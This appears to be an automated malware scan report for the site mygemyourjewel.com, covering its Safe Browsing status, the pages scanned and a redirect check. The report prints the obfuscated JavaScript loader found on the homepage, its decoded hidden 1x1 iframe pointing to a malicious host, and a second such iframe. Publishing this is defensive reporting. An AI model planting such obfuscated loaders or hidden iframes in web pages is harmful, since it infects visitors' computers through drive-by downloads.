Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mygemyourjewel.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mygemyourjewel.com/ | 200 OK Content-Length: 12170 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,50,32,59,23,56,17,28,51,31,0,0,0,0,0,0,20,16,33,21,44,40,8,41,22,54,29,55,10,46,62,61,26,18,24,5,34,15,38,30,43,19,37,0,0,0,0,27,0,6,1,35,58,7,45,12,39,60,42,52,0,25,9,2,49,14,3,4,11,53,36,57,13,48,47);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("m1iy4Yg1l4Ekge7kxcwB@WRBxrg8oK7kRWFZeHEu4_gVeI7k64OhLjEZ4afubtDultiTaXiTa_DTkYz8c9MyCQqwk4ndhYWZBrM8a0Nwk80dvtgwT9qOy9W5vcnVeMmVL1iy4Yg1lzwB")
Decoded script: <iframe width="1" height="1" src="http://32tsdgseg.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>
Antivirus reports:
Malicious iFrame found. The same iFrame was found in 21 websites.
size: 1x1
src: http://shoughbo.com/images/start.php?id=vlnd
This URL is marked by Google as suspicious
<iframe width="1" height="1" src="http://shoughbo.com/images/start.php?id=vlnd">
http://mygemyourjewel.com/menuscript.js | 200 OK Content-Length: 1031 Content-Type: application/javascript | clean |
http://www.ace-counters.com/scripts/script.asp?id=19576 | 200 OK Content-Length: 183 Content-Type: text/html | clean |
http://www.ace-counters.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mygemyourjewel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 04:52:07 GMT
Accept-Ranges: bytes
ETag: "10d136fc-2f8a-49b330d52a500"
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding,User-Agent
Content-Length: 12170
Content-Type: text/html
Last-Modified: Tue, 01 Feb 2011 06:57:56 GMT
...12170 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mygemyourjewel.com
Referer: http://www.google.com/search?q=mygemyourjewel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.